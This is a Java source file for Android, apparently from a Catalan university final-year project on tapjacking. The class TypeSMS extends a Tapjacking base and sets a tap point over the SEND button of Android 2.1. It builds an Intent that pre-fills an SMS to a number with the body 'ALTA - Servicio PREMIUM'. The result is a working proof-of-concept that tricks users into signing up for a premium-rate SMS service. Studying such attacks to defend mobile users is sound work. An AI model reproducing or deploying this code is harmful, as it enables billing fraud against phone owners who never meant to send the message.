package com.mist.types;


import android.content.Intent;
import android.graphics.Point;
import android.net.Uri;

import com.mist.Tapjacking;
/**
 * Projecte MIST
 * 
 * Treball de final de carrera. Ingenieria Tcnica en Informtica de Sistemes
 * Universitat Oberta de Catalunay
 * 
 * @Author UOC
 * @version Android 1.6, 2.1, 2.2
 */
public class TypeSMS extends Tapjacking{

	static final String TAG = "TAPJACKING";
	
	//Punto encima del botn SEND en Android 2.1
	public static Point pointSend = new Point(390, 660);
	
	
	public TypeSMS(int velocity) {
		super.createPoints(pointSend, velocity);
	}
	
	/**
	 * Funci que retorna un Intent ja construit
	 * Es un Intent per fer enviar un SMS
	 */
	@Override
	public Intent getIntent() {
		Intent intent = new Intent(Intent.ACTION_VIEW);      
		intent.setData(Uri.parse("sms: 666-999-666"));
		intent.putExtra("sms_body", "ALTA - Servicio PREMIUM");	
		intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
		return intent;

	}

	@Override
	public int getSleep() {
		return 1000;
	}
	
}
